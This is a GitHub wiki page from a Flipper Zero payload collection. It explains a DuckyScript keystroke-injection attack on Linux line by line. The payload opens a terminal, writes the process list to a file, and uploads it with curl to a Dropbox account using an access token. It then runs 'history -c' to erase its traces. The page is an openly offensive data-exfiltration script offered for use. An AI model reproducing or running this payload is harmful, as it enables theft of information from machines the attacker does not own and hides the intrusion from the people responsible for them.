Exfiltrate Process Info Linux - aleff-github/my-flipper-shits GitHub Wiki

Documentation

This is a DuckyScript code for exfiltrating process information from a Linux machine using Dropbox Webhook. The code was written by Aleff and its version number is 1.0. The code is meant to be run on a Linux machine and requires an internet connection as well as a Dropbox access token.

Script Information

  • Title: Exfiltrate Process Info
  • Author: Aleff
  • Version: 1.0
  • Category: Exfiltration
  • Target: Linux

Requirements

  • Internet Connection
  • Dropbox Webhook

Code Explanation

Delay Commands

  • DELAY 1000: Delays the execution of the next command by 1 second.
  • DELAY 2000: Delays the execution of the next command by 2 seconds.
  • DELAY 500: Delays the execution of the next command by 500 milliseconds.

Keyboard Commands

  • CTRL-ALT t: Presses the CTRL, ALT, and t keys together.

String Commands

  • STRING ps aux > process.txt: Types the ps aux > process.txt command into the Linux terminal, which outputs the process information into a file named process.txt.
  • STRING ACCESS_TOKEN=": Types the ACCESS_TOKEN=" string into the terminal.
  • STRING TOKEN: Types the TOKEN value into the terminal.
  • STRING ": Types the closing " character into the terminal.
  • STRING USER_NAME=$(whoami): Types the USER_NAME=$(whoami) command into the terminal, which retrieves the username of the current user.
  • STRING TXT_PATH="/home/$USER_NAME/process.txt": Types the TXT_PATH="/home/$USER_NAME/process.txt" command into the terminal, which sets the path of the process.txt file.
  • STRING DROPBOX_FOLDER="/: Types the DROPBOX_FOLDER="/ string into the terminal.
  • STRING DROPBOX_FOLDER_NAME: Types the DROPBOX_FOLDER_NAME value into the terminal.
  • STRING ": Types the closing " character into the terminal.
  • STRING curl -X POST: Types the curl -X POST command into the terminal, which sends a POST request to the Dropbox API.
  • STRING DROPBOX_API_CONST: Types the DROPBOX_API_CONST value into the terminal, which is the API endpoint for uploading files to Dropbox.
  • STRING --header "Authorization: Bearer $ACCESS_TOKEN": Types the --header "Authorization: Bearer $ACCESS_TOKEN" string into the terminal, which specifies the access token for Dropbox API authentication.
  • STRING --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}": Types the --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" string into the terminal, which specifies the Dropbox folder and upload options.
  • STRING --header "Content-Type: application/octet-stream": Types the --header "Content-Type: application/octet-stream" string into the terminal, which specifies the content type of the uploaded file.
  • STRING --data-binary "@$TXT_PATH": Types the --data-binary "@$TXT_PATH" string into the terminal, which specifies the path of the file to be uploaded.

Define Commands

  • DEFINE TOKEN example: Sets the TOKEN value to example.
  • DEFINE DROPBOX_FOLDER_NAME example: Sets the DROPBOX_FOLDER_NAME value to example.

Remove Traces Commands

  • STRING history -c: Types the history -c command into the terminal, which clears the command history.
  • STRING exit: Types the exit command into the terminal, which exits the terminal session.